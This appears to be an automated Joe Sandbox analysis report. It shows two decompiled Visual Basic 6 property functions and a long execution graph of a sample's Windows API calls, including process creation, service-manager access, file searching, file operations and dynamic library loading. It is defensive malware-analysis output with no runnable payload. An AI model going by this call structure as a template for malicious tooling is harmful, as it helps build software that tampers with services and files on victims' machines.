                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 52%
                                                        			E00416F50(intOrPtr* _a4, void* _a8) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v24;
                                                        				intOrPtr _v28;
                                                        				intOrPtr _v36;
                                                        				short _t21;
                                                        				void* _t24;
                                                        				intOrPtr* _t26;
                                                        				void* _t29;
                                                        				void* _t38;
                                                        				intOrPtr* _t39;
                                                        				void* _t41;
                                                        				intOrPtr* _t42;
                                                        				intOrPtr _t44;
                                                        				intOrPtr _t45;
                                                        
                                                        				 *[fs:0x0] = _t44;
                                                        				_t45 = _t44 - 0x1c;
                                                        				_v16 = _t45;
                                                        				_v12 = 0x401400;
                                                        				_v8 = 0;
                                                        				_t42 = _a4;
                                                        				_t21 =  *((intOrPtr*)( *_t42 + 4))(_t42, _t38, _t41, _t29,  *[fs:0x0], 0x401d26);
                                                        				__imp____vbaI2I4();
                                                        				_t39 = _t45 - 0x10;
                                                        				 *((short*)(_t42 + 0x40)) = _t21;
                                                        				 *_t39 = 8;
                                                        				 *((intOrPtr*)(_t39 + 4)) = _v36;
                                                        				 *(_t39 + 8) = L"BorderStyle";
                                                        				 *((intOrPtr*)(_t39 + 0xc)) = _v28;
                                                        				_t24 =  *((intOrPtr*)( *_t42 + 0x390))(_t42);
                                                        				asm("fclex");
                                                        				if(_t24 < 0) {
                                                        					__imp____vbaHresultCheckObj(_t24, _t42, 0x40f430, 0x390);
                                                        				}
                                                        				 *((intOrPtr*)( *_t42 + 0x8a4))(_t42);
                                                        				_t26 = _a4;
                                                        				 *((intOrPtr*)( *_t26 + 8))(_t26);
                                                        				 *[fs:0x0] = _v24;
                                                        				return _v8;
                                                        			}



















                                                        0x00416f62
                                                        0x00416f69
                                                        0x00416f6f
                                                        0x00416f72
                                                        0x00416f79
                                                        0x00416f80
                                                        0x00416f86
                                                        0x00416f8c
                                                        0x00416f9a
                                                        0x00416f9e
                                                        0x00416fa7
                                                        0x00416fad
                                                        0x00416fb0
                                                        0x00416fb6
                                                        0x00416fb9
                                                        0x00416fc1
                                                        0x00416fc3
                                                        0x00416fd1
                                                        0x00416fd1
                                                        0x00416fda
                                                        0x00416fe0
                                                        0x00416fe6
                                                        0x00416ff1
                                                        0x00416ffc

                                                        APIs
                                                        • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,00401D26), ref: 00416F8C
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401400,0040F430,00000390,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00416FD1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckHresult
                                                        • String ID: BorderStyle
                                                        • API String ID: 713191129-3833701590
                                                        • Opcode ID: ce8aff9f2539494ab2f6c367e7d7098774b8a66c4b01d15be652c2db280226f6
                                                        • Instruction ID: e7b1197cfcb793cc38c97bf6b1250f107d73d9444ce6c53fe0f987ea894c874f
                                                        • Opcode Fuzzy Hash: ce8aff9f2539494ab2f6c367e7d7098774b8a66c4b01d15be652c2db280226f6
                                                        • Instruction Fuzzy Hash: A4115675A00204EFC700EF58C949B9ABBF8FF08700F10826AE949A7750C778A844CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 44%
                                                        			E004175B0(intOrPtr* _a4, void* _a8) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v24;
                                                        				intOrPtr _v28;
                                                        				intOrPtr _v36;
                                                        				short _t20;
                                                        				void* _t23;
                                                        				intOrPtr* _t24;
                                                        				void* _t27;
                                                        				void* _t35;
                                                        				intOrPtr* _t36;
                                                        				void* _t38;
                                                        				intOrPtr* _t39;
                                                        				intOrPtr _t41;
                                                        				intOrPtr _t42;
                                                        
                                                        				 *[fs:0x0] = _t41;
                                                        				_t42 = _t41 - 0x1c;
                                                        				_v16 = _t42;
                                                        				_v12 = 0x401450;
                                                        				_v8 = 0;
                                                        				_t39 = _a4;
                                                        				_t20 =  *((intOrPtr*)( *_t39 + 4))(_t39, _t35, _t38, _t27,  *[fs:0x0], 0x401d26);
                                                        				__imp____vbaI2I4();
                                                        				_t36 = _t42 - 0x10;
                                                        				 *((short*)(_t39 + 0x44)) = _t20;
                                                        				 *_t36 = 8;
                                                        				 *((intOrPtr*)(_t36 + 4)) = _v36;
                                                        				 *(_t36 + 8) = L"CaseType";
                                                        				 *((intOrPtr*)(_t36 + 0xc)) = _v28;
                                                        				_t23 =  *((intOrPtr*)( *_t39 + 0x390))(_t39);
                                                        				asm("fclex");
                                                        				if(_t23 < 0) {
                                                        					__imp____vbaHresultCheckObj(_t23, _t39, 0x40f430, 0x390);
                                                        				}
                                                        				_t24 = _a4;
                                                        				 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                        				 *[fs:0x0] = _v24;
                                                        				return _v8;
                                                        			}



















                                                        0x004175c2
                                                        0x004175c9
                                                        0x004175cf
                                                        0x004175d2
                                                        0x004175d9
                                                        0x004175e0
                                                        0x004175e6
                                                        0x004175ec
                                                        0x004175fa
                                                        0x004175fe
                                                        0x00417607
                                                        0x0041760d
                                                        0x00417610
                                                        0x00417616
                                                        0x00417619
                                                        0x00417621
                                                        0x00417623
                                                        0x00417631
                                                        0x00417631
                                                        0x00417637
                                                        0x0041763d
                                                        0x00417648
                                                        0x00417653

                                                        APIs
                                                        • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,00401D26), ref: 004175EC
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401450,0040F430,00000390,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00417631
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckHresult
                                                        • String ID: CaseType
                                                        • API String ID: 713191129-1044249967
                                                        • Opcode ID: cfebf2b23974337f74f1340cefa7522e16b9cb326a86f58115f7feb7f190b4a5
                                                        • Instruction ID: dab01437edc7d4398b877ff803f47f8355358e44c42aaa91b3c8c06ba69b01dd
                                                        • Opcode Fuzzy Hash: cfebf2b23974337f74f1340cefa7522e16b9cb326a86f58115f7feb7f190b4a5
                                                        • Instruction Fuzzy Hash: C2115875A00204EFC700EF58CA49B9ABBF8FF18710F10816AF949E7790D778A844CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:9.5%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0.9%
                                                        Total number of Nodes:1170
                                                        Total number of Limit Nodes:13

                                                        Graph

                                                        execution_graph 5872 364b70 5873 364b82 5872->5873 5874 364b98 5872->5874 5875 363f00 GetPEB 5873->5875 5878 364bd7 CreateProcessW 5874->5878 5879 363f00 GetPEB 5874->5879 5876 364b8c 5875->5876 5877 363e60 GetPEB 5876->5877 5877->5874 5880 364bf7 5878->5880 5881 364c73 5878->5881 5882 364bc6 5879->5882 5883 364bff 5880->5883 5885 363f00 GetPEB 5880->5885 5890 364c33 5880->5890 5884 363e60 GetPEB 5882->5884 5886 364bd2 5884->5886 5887 364c27 5885->5887 5886->5878 5888 363e60 GetPEB 5887->5888 5888->5890 5889 364c5d 5890->5889 5891 363f00 GetPEB 5890->5891 5892 364c51 5891->5892 5893 363e60 GetPEB 5892->5893 5893->5889 6891 3664b0 6892 3664ba 6891->6892 6897 3664d0 6891->6897 6893 363f00 GetPEB 6892->6893 6894 3664c4 6893->6894 6895 363e60 GetPEB 6894->6895 6895->6897 6896 36659a 6897->6896 6898 3642c0 GetPEB 6897->6898 6899 36657b 6898->6899 6899->6896 6901 364160 6899->6901 6902 364180 6901->6902 6903 364172 6901->6903 6902->6896 6904 363f00 GetPEB 6903->6904 6905 364177 6904->6905 6906 363e60 GetPEB 6905->6906 6906->6902 6913 367fb0 6914 3634c0 GetPEB 6913->6914 6915 367fc2 6914->6915 6916 363f00 GetPEB 6915->6916 6920 367fe3 6915->6920 6917 367fd7 6916->6917 6918 363e60 GetPEB 6917->6918 6918->6920 6919 368029 6923 368051 6919->6923 6925 363f00 GetPEB 6919->6925 6920->6919 6921 363f00 GetPEB 6920->6921 6922 36801d 6921->6922 6924 363e60 GetPEB 6922->6924 6928 36807d 6923->6928 6929 363f00 GetPEB 6923->6929 6924->6919 6926 368045 6925->6926 6927 363e60 GetPEB 6926->6927 6927->6923 6930 368071 6929->6930 6931 363e60 GetPEB 6930->6931 6931->6928 6932 3678b0 6933 367990 6932->6933 6934 367c1e 6933->6934 6935 367c05 6933->6935 6936 3634c0 GetPEB 6933->6936 6941 363e60 GetPEB 6933->6941 6942 363f00 GetPEB 6933->6942 6937 363f00 GetPEB 6934->6937 6938 367c3d 6934->6938 6936->6933 6939 367c31 6937->6939 6940 363e60 GetPEB 6939->6940 6940->6938 6941->6933 6942->6933 7100 364df0 GetPEB 5818 3630a0 5825 3630ba 5818->5825 5819 3632ab 5827 363238 5819->5827 5828 363f00 GetPEB 5819->5828 5821 363291 RtlAllocateHeap 5821->5825 5821->5827 5822 363f00 GetPEB 5822->5825 5825->5819 5825->5821 5825->5822 5826 363e60 GetPEB 5825->5826 5825->5827 5826->5825 5829 3632bf 5828->5829 5830 363e60 5829->5830 5831 363ebc 5830->5831 5833 363e9c 5830->5833 5831->5827 5832 363ef4 5832->5827 5833->5831 5833->5832 5834 363f00 GetPEB 5833->5834 5837 3640f5 5833->5837 5835 3640e9 5834->5835 5836 363e60 GetPEB 5835->5836 5836->5837 5838 363f00 GetPEB 5837->5838 5844 364126 5837->5844 5840 36411a 5838->5840 5839 363e60 GetPEB 5841 364157 5839->5841 5842 363e60 GetPEB 5840->5842 5841->5827 5842->5844 5843 364138 5843->5827 5844->5839 5844->5843 5894 365ce0 5902 3665e0 5894->5902 5896 365ce5 5897 365d09 ExitProcess 5896->5897 5898 363f00 GetPEB 5896->5898 5899 365cf8 5898->5899 5900 363e60 GetPEB 5899->5900 5901 365d04 5900->5901 5901->5897 5947 3665fd 5902->5947 5904 366dcd 6220 36b2e0 5904->6220 5907 36706e 6245 368740 5907->6245 5909 3668df 5909->5896 5911 363f00 GetPEB 5938 366927 5911->5938 5912 367061 6236 368d40 5912->6236 5919 366f27 GetTickCount 5919->5947 5926 367073 5926->5896 5928 364220 GetPEB 5928->5947 5932 363f00 GetPEB 5932->5947 5933 367066 5933->5896 5938->5911 5938->5919 5942 366975 GetTickCount 5938->5942 5943 363e60 GetPEB 5938->5943 5941 363e60 GetPEB 5941->5947 5942->5947 5943->5938 5946 364160 GetPEB 5946->5947 5947->5904 5947->5907 5947->5909 5947->5912 5947->5928 5947->5932 5947->5938 5947->5941 5947->5946 5948 368400 5947->5948 5954 367120 5947->5954 5975 368e80 5947->5975 5985 368970 5947->5985 5997 3680a0 5947->5997 6011 369860 5947->6011 6027 369620 5947->6027 6036 3612b0 5947->6036 6057 36afe0 5947->6057 6062 368700 5947->6062 6068 366060 5947->6068 6089 36b430 5947->6089 6096 369f30 5947->6096 6105 3661e0 5947->6105 6117 3694d0 5947->6117 6124 363310 5947->6124 6134 361840 5947->6134 6149 363460 5947->6149 6159 3653d0 5947->6159 6164 369270 5947->6164 6174 368bb0 5947->6174 6184 3672d0 5947->6184 6194 369050 5947->6194 6208 364770 5947->6208 6225 36b1d0 5947->6225 6230 367410 5947->6230 5949 3684e3 5948->5949 5950 368600 CreateFileW 5949->5950 5951 3685bd 5949->5951 5952 363f00 GetPEB 5949->5952 5953 363e60 GetPEB 5949->5953 5950->5949 5950->5951 5951->5947 5952->5949 5953->5949 5957 367125 5954->5957 5955 367233 6263 3634c0 5955->6263 5957->5955 5959 367232 5957->5959 5962 367080 GetPEB LoadLibraryW 5957->5962 5959->5947 5960 367265 LoadLibraryW 5963 367290 5960->5963 5964 36727a 5960->5964 5961 363f00 GetPEB 5965 367254 5961->5965 5962->5957 5969 3672b8 5963->5969 5972 363f00 GetPEB 5963->5972 5966 363f00 GetPEB 5964->5966 5967 363e60 GetPEB 5965->5967 5968 367284 5966->5968 5970 367260 5967->5970 5971 363e60 GetPEB 5968->5971 5969->5947 5970->5960 5971->5963 5973 3672ac 5972->5973 5974 363e60 GetPEB 5973->5974 5974->5969 5984 368ea0 5975->5984 5976 36901b 5978 368fc6 5976->5978 5979 363f00 GetPEB 5976->5979 5977 368ff2 OpenServiceW 5977->5984 5978->5947 5980 36902e 5979->5980 5983 363e60 GetPEB 5980->5983 5981 363f00 GetPEB 5981->5984 5982 363e60 GetPEB 5982->5984 5983->5978 5984->5976 5984->5977 5984->5978 5984->5981 5984->5982 5994 368991 5985->5994 5987 368add 5987->5947 5988 3634c0 GetPEB 5988->5994 5989 368b74 5989->5987 5991 363f00 GetPEB 5989->5991 5990 363e60 GetPEB 5990->5994 5993 368b87 5991->5993 5992 363f00 GetPEB 5992->5994 5995 363e60 GetPEB 5993->5995 5994->5987 5994->5988 5994->5989 5994->5990 5994->5992 5996 363460 GetPEB 5994->5996 6273 365040 5994->6273 5995->5987 5996->5994 6010 368163 5997->6010 5998 3634c0 GetPEB 5998->6010 5999 368397 CreateFileW 6000 3683ee 5999->6000 5999->6010 6000->5947 6001 3683c7 6003 3683eb CloseHandle 6001->6003 6005 363f00 GetPEB 6001->6005 6002 368358 6002->5947 6003->6000 6004 363e60 GetPEB 6004->6010 6006 3683da 6005->6006 6007 363e60 GetPEB 6006->6007 6009 3683e6 6007->6009 6008 363f00 GetPEB 6008->6010 6009->6003 6010->5998 6010->5999 6010->6001 6010->6002 6010->6004 6010->6008 6014 369880 6011->6014 6012 3699b2 OpenSCManagerW 6012->6014 6013 369b02 6016 369b26 SHGetFolderPathW 6013->6016 6017 363f00 GetPEB 6013->6017 6014->6012 6014->6013 6015 369af5 6014->6015 6018 369a66 CloseServiceHandle 6014->6018 6021 363f00 GetPEB 6014->6021 6022 369969 SHGetFolderPathW 6014->6022 6026 363e60 GetPEB 6014->6026 6303 367c60 6014->6303 6015->5947 6298 363040 6016->6298 6023 369b15 6017->6023 6018->6014 6021->6014 6022->6014 6024 363e60 GetPEB 6023->6024 6025 369b21 6024->6025 6025->6016 6026->6014 6035 369630 6027->6035 6028 369829 6327 363780 6028->6327 6029 3634c0 GetPEB 6029->6035 6030 36981f 6030->5947 6032 369839 6032->5947 6033 363f00 GetPEB 6033->6035 6034 363e60 GetPEB 6034->6035 6035->6028 6035->6029 6035->6030 6035->6033 6035->6034 6056 3612e1 6036->6056 6038 36181c 6456 364220 6038->6456 6039 363f00 GetPEB 6039->6056 6041 3617d1 6041->5947 6043 3642c0 GetPEB 6043->6056 6045 3634c0 GetPEB 6045->6056 6046 363e60 GetPEB 6046->6056 6050 364220 GetPEB 6050->6056 6051 361641 _snwprintf 6053 363460 GetPEB 6051->6053 6053->6056 6055 363460 GetPEB 6055->6056 6056->6038 6056->6039 6056->6041 6056->6043 6056->6045 6056->6046 6056->6050 6056->6051 6056->6055 6354 361fc0 6056->6354 6362 361e70 6056->6362 6371 365c00 6056->6371 6390 361c70 6056->6390 6406 362230 6056->6406 6414 362be0 6056->6414 6429 364ea0 6056->6429 6434 361900 6056->6434 6059 36b101 6057->6059 6061 36aff8 6057->6061 6058 363f00 GetPEB 6058->6061 6059->5947 6060 363e60 GetPEB 6060->6061 6061->6058 6061->6059 6061->6060 6063 368709 6062->6063 6066 36871f 6062->6066 6064 363f00 GetPEB 6063->6064 6065 368713 6064->6065 6067 363e60 GetPEB 6065->6067 6066->5947 6067->6066 6498 365500 6068->6498 6070 36613c 6072 3635c0 GetPEB 6070->6072 6071 366134 6071->5947 6075 366147 6072->6075 6073 363f00 GetPEB 6074 366074 6073->6074 6074->6070 6074->6071 6074->6073 6076 363e60 GetPEB 6074->6076 6077 366168 6075->6077 6078 363f00 GetPEB 6075->6078 6076->6074 6081 3661a2 6077->6081 6082 363f00 GetPEB 6077->6082 6079 36615c 6078->6079 6080 363e60 GetPEB 6079->6080 6080->6077 6085 3661ca 6081->6085 6086 363f00 GetPEB 6081->6086 6083 366196 6082->6083 6084 363e60 GetPEB 6083->6084 6084->6081 6085->5947 6087 3661be 6086->6087 6088 363e60 GetPEB 6087->6088 6088->6085 6091 36b440 6089->6091 6090 36b4ba 6090->5947 6091->6090 6508 36ab50 6091->6508 6524 36a170 6091->6524 6545 36a7a0 6091->6545 6565 36a5e0 6091->6565 6103 369f40 6096->6103 6097 36a01b 6098 369f64 6097->6098 6099 363f00 GetPEB 6097->6099 6098->5947 6100 36a02e 6099->6100 6101 363e60 GetPEB 6100->6101 6101->6098 6102 363f00 GetPEB 6102->6103 6103->6097 6103->6098 6103->6102 6104 363e60 GetPEB 6103->6104 6104->6103 6113 366202 6105->6113 6106 3642c0 GetPEB 6106->6113 6108 36624b 6108->5947 6110 363e60 GetPEB 6110->6113 6111 366490 6111->5947 6112 363f00 GetPEB 6112->6113 6113->6106 6113->6108 6113->6110 6113->6112 6115 36642d 6113->6115 6679 3655b0 6113->6679 6688 364c80 6113->6688 6114 363f00 GetPEB 6114->6115 6115->6111 6115->6114 6116 363e60 GetPEB 6115->6116 6116->6115 6122 3694f0 6117->6122 6118 3695c2 6118->5947 6120 363f00 GetPEB 6120->6122 6121 364c80 GetPEB 6121->6122 6122->6118 6122->6120 6122->6121 6123 363e60 GetPEB 6122->6123 6697 3646c0 6122->6697 6123->6122 6125 36334a 6124->6125 6126 36336f 6125->6126 6127 363f00 GetPEB 6125->6127 6130 363f00 GetPEB 6126->6130 6133 363397 6126->6133 6128 363363 6127->6128 6129 363e60 GetPEB 6128->6129 6129->6126 6131 36338b 6130->6131 6132 363e60 GetPEB 6131->6132 6132->6133 6133->5947 6135 361862 6134->6135 6136 36184c 6134->6136 6140 363f00 GetPEB 6135->6140 6144 36188b 6135->6144 6137 363f00 GetPEB 6136->6137 6138 361856 6137->6138 6139 363e60 GetPEB 6138->6139 6139->6135 6141 36187f 6140->6141 6142 363e60 GetPEB 6141->6142 6142->6144 6143 3618ee 6143->5947 6144->6143 6144->6144 6712 3625e0 6144->6712 6146 3618d8 6147 3618dc 6146->6147 6148 364220 GetPEB 6146->6148 6147->5947 6148->6143 6150 36346d 6149->6150 6152 363483 6149->6152 6151 363f00 GetPEB 6150->6151 6153 363477 6151->6153 6154 3634ab 6152->6154 6156 363f00 GetPEB 6152->6156 6155 363e60 GetPEB 6153->6155 6154->5947 6155->6152 6157 36349f 6156->6157 6158 363e60 GetPEB 6157->6158 6158->6154 6160 3653e0 6159->6160 6161 3654b4 6160->6161 6162 363f00 GetPEB 6160->6162 6163 363e60 GetPEB 6160->6163 6161->5947 6162->6160 6163->6160 6172 369290 6164->6172 6165 36949c 6167 369410 6165->6167 6169 363f00 GetPEB 6165->6169 6167->5947 6168 363f00 GetPEB 6168->6172 6170 3694af 6169->6170 6171 363e60 GetPEB 6170->6171 6171->6167 6172->6165 6172->6167 6172->6168 6173 363e60 GetPEB 6172->6173 6727 361000 6172->6727 6173->6172 6182 368bc4 6174->6182 6175 368d1d 6736 3636b0 6175->6736 6176 363780 2 API calls 6176->6182 6178 368d10 6178->5947 6180 3634c0 GetPEB 6180->6182 6181 363e60 GetPEB 6181->6182 6182->6175 6182->6176 6182->6178 6182->6180 6182->6181 6183 363f00 GetPEB 6182->6183 6183->6182 6185 3672ef 6184->6185 6186 3672d9 6184->6186 6190 367318 6185->6190 6191 363f00 GetPEB 6185->6191 6187 363f00 GetPEB 6186->6187 6188 3672e3 6187->6188 6189 363e60 GetPEB 6188->6189 6189->6185 6190->5947 6192 36730c 6191->6192 6193 363e60 GetPEB 6192->6193 6193->6190 6206 369070 6194->6206 6195 3691de 6195->5947 6196 3691e4 6197 36921f 6196->6197 6198 363f00 GetPEB 6196->6198 6202 369247 6197->6202 6203 363f00 GetPEB 6197->6203 6199 369213 6198->6199 6201 363e60 GetPEB 6199->6201 6200 363e60 GetPEB 6200->6206 6201->6197 6202->5947 6204 36923b 6203->6204 6207 363e60 GetPEB 6204->6207 6205 363f00 GetPEB 6205->6206 6206->6195 6206->6196 6206->6200 6206->6205 6207->6202 6209 364785 6208->6209 6211 36479b 6208->6211 6210 363f00 GetPEB 6209->6210 6213 36478f 6210->6213 6212 3647cb GetCurrentProcessId 6211->6212 6214 363f00 GetPEB 6211->6214 6217 3647d5 6212->6217 6215 363e60 GetPEB 6213->6215 6216 3647b7 6214->6216 6215->6211 6218 363e60 GetPEB 6216->6218 6217->5947 6219 3647c3 6218->6219 6219->6212 6222 36b2ec 6220->6222 6221 363f00 GetPEB 6221->6222 6222->6221 6223 36b422 6222->6223 6224 363e60 GetPEB 6222->6224 6223->5909 6224->6222 6229 36b1e0 6225->6229 6226 36b2b2 6226->5947 6226->6226 6227 363f00 GetPEB 6227->6229 6228 363e60 GetPEB 6228->6229 6229->6226 6229->6227 6229->6228 6235 367420 6230->6235 6231 367608 6231->5947 6232 364fd0 GetPEB 6232->6235 6233 363f00 GetPEB 6233->6235 6234 363e60 GetPEB 6234->6235 6235->6231 6235->6232 6235->6233 6235->6234 6243 368d50 6236->6243 6237 368e3f 6238 364b70 2 API calls 6237->6238 6240 368e4f 6238->6240 6239 368e29 6239->5933 6240->5933 6241 3634c0 GetPEB 6241->6243 6242 363f00 GetPEB 6242->6243 6243->6237 6243->6239 6243->6241 6243->6242 6244 363e60 GetPEB 6243->6244 6244->6243 6248 368753 6245->6248 6246 3634c0 GetPEB 6246->6248 6247 368903 6252 363f00 GetPEB 6247->6252 6253 368922 6247->6253 6248->6246 6248->6247 6250 3688df 6248->6250 6251 368e80 2 API calls 6248->6251 6254 363e60 GetPEB 6248->6254 6258 363f00 GetPEB 6248->6258 6261 363780 2 API calls 6248->6261 6755 367700 6248->6755 6250->5926 6251->6248 6255 368916 6252->6255 6256 368955 6253->6256 6259 363f00 GetPEB 6253->6259 6254->6248 6257 363e60 GetPEB 6255->6257 6256->5926 6257->6253 6258->6248 6260 368949 6259->6260 6262 363e60 GetPEB 6260->6262 6261->6248 6262->6256 6264 3634e3 6263->6264 6265 363508 6264->6265 6266 363f00 GetPEB 6264->6266 6268 363530 6265->6268 6270 363f00 GetPEB 6265->6270 6267 3634fc 6266->6267 6269 363e60 GetPEB 6267->6269 6268->5960 6268->5961 6269->6265 6271 363524 6270->6271 6272 363e60 GetPEB 6271->6272 6272->6268 6287 36505c 6273->6287 6274 365367 6275 365386 6274->6275 6276 363f00 GetPEB 6274->6276 6277 3653ae 6275->6277 6280 363f00 GetPEB 6275->6280 6278 36537a 6276->6278 6277->5994 6279 363e60 GetPEB 6278->6279 6279->6275 6283 3653a2 6280->6283 6281 36534d RtlAllocateHeap 6281->6277 6281->6287 6284 363e60 GetPEB 6283->6284 6284->6277 6285 363e60 GetPEB 6285->6287 6286 363f00 GetPEB 6286->6287 6287->6274 6287->6277 6287->6281 6287->6285 6287->6286 6288 3642c0 6287->6288 6289 3642cd 6288->6289 6295 3642e3 6288->6295 6290 363f00 GetPEB 6289->6290 6291 3642d7 6290->6291 6292 363e60 GetPEB 6291->6292 6292->6295 6293 36430b 6293->6287 6294 363f00 GetPEB 6296 3642ff 6294->6296 6295->6293 6295->6294 6297 363e60 GetPEB 6296->6297 6297->6293 6299 363050 6298->6299 6301 36307a 6299->6301 6313 3638f0 6299->6313 6301->6015 6302 363092 6302->6015 6304 367c80 6303->6304 6305 367d97 6304->6305 6306 367ddd 6304->6306 6308 363f00 GetPEB 6304->6308 6310 363e60 GetPEB 6304->6310 6305->6014 6307 367dfd 6306->6307 6309 363f00 GetPEB 6306->6309 6307->6014 6308->6304 6311 367df1 6309->6311 6310->6304 6312 363e60 GetPEB 6311->6312 6312->6307 6325 363910 6313->6325 6314 363a3b FindFirstFileW 6317 363b8f 6314->6317 6314->6325 6315 363ac1 6315->6302 6316 363f00 GetPEB 6316->6325 6317->6302 6318 363b70 6318->6317 6319 363f00 GetPEB 6318->6319 6321 363b83 6319->6321 6320 363e60 GetPEB 6320->6325 6322 363e60 GetPEB 6321->6322 6322->6317 6323 3634c0 GetPEB 6323->6325 6324 3638f0 GetPEB 6324->6325 6325->6314 6325->6315 6325->6316 6325->6318 6325->6320 6325->6323 6325->6324 6326 363460 GetPEB 6325->6326 6326->6325 6328 363795 6327->6328 6329 3637ab 6327->6329 6330 363f00 GetPEB 6328->6330 6332 3637dd 6329->6332 6334 363f00 GetPEB 6329->6334 6331 36379f 6330->6331 6333 363e60 GetPEB 6331->6333 6337 363812 6332->6337 6338 363f00 GetPEB 6332->6338 6333->6329 6335 3637d1 6334->6335 6336 363e60 GetPEB 6335->6336 6336->6332 6340 36384a 6337->6340 6342 363f00 GetPEB 6337->6342 6339 363806 6338->6339 6341 363e60 GetPEB 6339->6341 6345 363f00 GetPEB 6340->6345 6350 363876 6340->6350 6341->6337 6343 36383e 6342->6343 6344 363e60 GetPEB 6343->6344 6344->6340 6346 36386a 6345->6346 6348 363e60 GetPEB 6346->6348 6347 3638d1 SHFileOperationW 6347->6032 6348->6350 6349 363f00 GetPEB 6351 3638c0 6349->6351 6350->6347 6350->6349 6352 363e60 GetPEB 6351->6352 6353 3638cc 6352->6353 6353->6347 6360 361fd2 6354->6360 6355 362212 6356 362208 6355->6356 6359 364220 GetPEB 6355->6359 6356->6056 6357 3642c0 GetPEB 6357->6360 6358 363f00 GetPEB 6358->6360 6359->6356 6360->6355 6360->6356 6360->6357 6360->6358 6361 363e60 GetPEB 6360->6361 6361->6360 6367 361e86 6362->6367 6363 361f77 6364 361f68 6363->6364 6365 363f00 GetPEB 6363->6365 6364->6056 6366 361f98 6365->6366 6368 363e60 GetPEB 6366->6368 6367->6363 6367->6364 6369 363f00 GetPEB 6367->6369 6370 363e60 GetPEB 6367->6370 6368->6364 6369->6367 6370->6367 6372 365c10 6371->6372 6373 365c26 6371->6373 6374 363f00 GetPEB 6372->6374 6377 363f00 GetPEB 6373->6377 6381 365c4e 6373->6381 6375 365c1a 6374->6375 6376 363e60 GetPEB 6375->6376 6376->6373 6378 365c42 6377->6378 6380 363e60 GetPEB 6378->6380 6379 365cd2 6379->6056 6380->6381 6381->6379 6382 363f00 GetPEB 6381->6382 6384 365c99 6381->6384 6383 365c8d 6382->6383 6385 363e60 GetPEB 6383->6385 6386 365cc1 6384->6386 6387 363f00 GetPEB 6384->6387 6385->6384 6386->6056 6388 365cb5 6387->6388 6389 363e60 GetPEB 6388->6389 6389->6386 6391 361cf0 6390->6391 6392 361d06 6390->6392 6393 363f00 GetPEB 6391->6393 6396 361dad 6392->6396 6397 363f00 GetPEB 6392->6397 6394 361cfa 6393->6394 6395 363e60 GetPEB 6394->6395 6395->6392 6400 361de1 6396->6400 6401 363f00 GetPEB 6396->6401 6398 361da1 6397->6398 6399 363e60 GetPEB 6398->6399 6399->6396 6404 364ea0 GetPEB 6400->6404 6402 361dd5 6401->6402 6403 363e60 GetPEB 6402->6403 6403->6400 6405 361e15 6404->6405 6405->6056 6407 362255 6406->6407 6408 36229c 6407->6408 6409 363f00 GetPEB 6407->6409 6410 3625be 6407->6410 6412 363e60 GetPEB 6407->6412 6408->6056 6409->6407 6411 3625cd 6410->6411 6413 364220 GetPEB 6410->6413 6411->6056 6412->6407 6413->6411 6428 362c1a 6414->6428 6415 362fcf 6418 362fee 6415->6418 6420 363f00 GetPEB 6415->6420 6417 362cae 6417->6056 6418->6056 6419 363f00 GetPEB 6419->6428 6422 362fe2 6420->6422 6421 3634c0 GetPEB 6421->6428 6423 363e60 GetPEB 6422->6423 6423->6418 6424 363e60 GetPEB 6424->6428 6425 363460 GetPEB 6425->6428 6426 364220 GetPEB 6426->6428 6428->6415 6428->6417 6428->6419 6428->6421 6428->6424 6428->6425 6428->6426 6466 3656f0 6428->6466 6475 362980 6428->6475 6431 364eb6 6429->6431 6430 363f00 GetPEB 6430->6431 6431->6430 6432 364f3d 6431->6432 6433 363e60 GetPEB 6431->6433 6432->6056 6433->6431 6455 36191f 6434->6455 6435 361bc6 6436 3635c0 GetPEB 6435->6436 6438 361bd0 6436->6438 6437 361ba4 6437->6056 6439 361bf1 6438->6439 6441 363f00 GetPEB 6438->6441 6443 361c23 6439->6443 6445 363f00 GetPEB 6439->6445 6440 363f00 GetPEB 6440->6455 6442 361be5 6441->6442 6444 363e60 GetPEB 6442->6444 6448 361c4b 6443->6448 6449 363f00 GetPEB 6443->6449 6444->6439 6446 361c17 